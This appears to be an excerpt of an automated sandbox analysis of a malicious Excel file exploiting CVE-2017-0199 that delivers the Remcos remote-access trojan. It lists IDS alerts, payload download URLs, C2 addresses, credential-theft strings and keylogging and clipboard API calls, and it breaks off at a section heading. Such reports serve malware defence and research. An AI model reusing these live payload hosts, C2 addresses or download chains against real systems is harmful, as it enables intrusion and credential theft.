                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80

                  Networking

                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49174 -> 192.3.101.172:2404
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49173 -> 192.3.101.172:2404
                  Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 198.12.81.228:80 -> 192.168.2.22:49172
                  Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 198.12.81.228:80 -> 192.168.2.22:49172
                  Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.232.154:443 -> 192.168.2.22:49171
                  Source: Malware configuration extractorURLs: 192.3.101.172
                  Source: global trafficHTTP traffic detected: GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1Host: ia803104.us.archive.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /600/RGGV.txt HTTP/1.1Host: 198.12.81.228Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 207.241.232.154 207.241.232.154
                  Source: Joe Sandbox ViewIP Address: 88.99.66.38 88.99.66.38
                  Source: Joe Sandbox ViewIP Address: 192.3.101.172 192.3.101.172
                  Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                  Source: Joe Sandbox ViewASN Name: INTERNET-ARCHIVEUS INTERNET-ARCHIVEUS
                  Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                  Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                  Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49175 -> 178.237.33.50:80
                  Source: global trafficHTTP traffic detected: GET /UlEYs1 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zhort.deConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /600/gv/sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.81.228Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /600/creatednewimagesinpicturebuttersmooth.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.81.228Connection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49164 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49165 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49166 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 207.241.232.154:443 -> 192.168.2.22:49171 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,14_2_0041B411
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EFA7CAA3.emf
                  Source: global trafficHTTP traffic detected: GET /UlEYs1 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zhort.deConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1Host: ia803104.us.archive.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /600/gv/sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.81.228Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /600/creatednewimagesinpicturebuttersmooth.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.81.228Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /600/RGGV.txt HTTP/1.1Host: 198.12.81.228Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: bhvA42C.tmp.15.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
                  Source: RegAsm.exe, 00000011.00000002.445648519.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                  Source: RegAsm.exe, RegAsm.exe, 00000011.00000002.445648519.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                  Source: RegAsm.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: bhvA42C.tmp.15.drString found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
                  Source: powershell.exe, 0000000C.00000002.441938406.0000000004FCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: RegAsm.exe, 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                  Source: RegAsm.exe, 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: zhort.de
                  Source: global trafficDNS traffic detected: DNS query: ia803104.us.archive.org
                  Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Wed, 28 Aug 2024 20:29:28 GMTContent-Type: text/html; charset=utf-8Content-Length: 144Connection: closeX-DNS-Prefetch-Control: offX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Download-Options: noopenX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Security-Policy: default-src 'none'
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Wed, 28 Aug 2024 20:29:29 GMTContent-Type: text/html; charset=utf-8Content-Length: 144Connection: closeX-DNS-Prefetch-Control: offX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Download-Options: noopenX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Security-Policy: default-src 'none'
                  Source: powershell.exe, 0000000C.00000002.438679378.000000000247A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.81.228
                  Source: powershell.exe, 0000000C.00000002.438679378.000000000247A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.81.228/600/RGGV.txt
                  Source: EQNEDT32.EXE, 00000008.00000002.422455144.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.12.81.228/600/creatednewimagesinpicturebuttersmooth.tIF
                  Source: EQNEDT32.EXE, 00000008.00000002.422455144.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.12.81.228/600/creatednewimagesinpicturebuttersmooth.tIFc
                  Source: EQNEDT32.EXE, 00000008.00000002.422455144.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.12.81.228/600/creatednewimagesinpicturebuttersmooth.tIFj
                  Source: RegAsm.exe, RegAsm.exe, 0000000E.00000002.1041736242.000000000037E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.1041669292.0000000000315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                  Source: powershell.exe, 0000000C.00000002.439632807.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: RegAsm.exe, RegAsm.exe, 00000011.00000002.445648519.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                  Source: RegAsm.exe, RegAsm.exe, 00000011.00000002.445648519.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 00000011.00000002.446215352.0000000000C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                  Source: RegAsm.exe, 00000011.00000002.445337578.000000000033C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/NK
                  Source: RegAsm.exe, 00000011.00000002.445648519.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                  Source: RegAsm.exe, 00000011.00000002.445648519.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                  Source: bhvA42C.tmp.15.drString found in binary or memory: http://www.msn.com/
                  Source: bhvA42C.tmp.15.drString found in binary or memory: http://www.msn.com/?ocid=iehp
                  Source: bhvA42C.tmp.15.drString found in binary or memory: http://www.msn.com/advertisement.ad.js
                  Source: bhvA42C.tmp.15.drString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
                  Source: RegAsm.exe, 00000011.00000002.445648519.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                  Source: RegAsm.exe, 0000000F.00000002.447784397.0000000000154000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net0
                  Source: bhvA42C.tmp.15.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                  Source: bhvA42C.tmp.15.drString found in binary or memory: https://contextual.media.net/
                  Source: bhvA42C.tmp.15.drString found in binary or memory: https://contextual.media.net/8/nrrV73987.js
                  Source: bhvA42C.tmp.15.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
                  Source: bhvA42C.tmp.15.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
                  Source: bhvA42C.tmp.15.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
                  Source: powershell.exe, 0000000C.00000002.439632807.0000000003249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 0000000C.00000002.439632807.0000000003249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 0000000C.00000002.439632807.0000000003249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: bhvA42C.tmp.15.drString found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
                  Source: bhvA42C.tmp.15.drString found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
                  Source: bhvA42C.tmp.15.drString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
                  Source: bhvA42C.tmp.15.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: powershell.exe, 0000000C.00000002.438679378.0000000002359000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org
                  Source: powershell.exe, 0000000C.00000002.441878558.0000000004B90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.441938406.0000000004FB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
                  Source: powershell.exe, 0000000A.00000002.443131890.00000000024C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org/27/items/vbs_20240LR
                  Source: bhvA42C.tmp.15.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                  Source: RegAsm.exeString found in binary or memory: https://login.yahoo.com/config/login
                  Source: powershell.exe, 0000000C.00000002.439632807.0000000003249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: bhvA42C.tmp.15.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                  Source: bhvA42C.tmp.15.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                  Source: powershell.exe, 0000000C.00000002.441938406.0000000004FCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: bhvA42C.tmp.15.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                  Source: RegAsm.exe, 0000000F.00000002.448125301.0000000000DC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                  Source: bhvA42C.tmp.15.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                  Source: RegAsm.exe, RegAsm.exe, 00000011.00000002.445648519.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: RegAsm.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                  Source: bhvA42C.tmp.15.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
                  Source: zhort.de.url.3.drString found in binary or memory: https://zhort.de/
                  Source: UlEYs1.url.3.drString found in binary or memory: https://zhort.de/UlEYs1
                  Source: SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsxString found in binary or memory: https://zhort.de/UlEYs1f
                  Source: ~DF12645870096F092E.TMP.0.dr, F9430000.0.drString found in binary or memory: https://zhort.de/UlEYs1yX
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                  Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49161 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49163 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,00000000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 16_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 16_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx
                  Source: Yara match | File source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 12.2.powershell.exe.417eb20.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 12.2.powershell.exe.417eb20.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000C.00000002.439632807.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2900, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 2496, type: MEMORYSTR

                  E-Banking Fraud

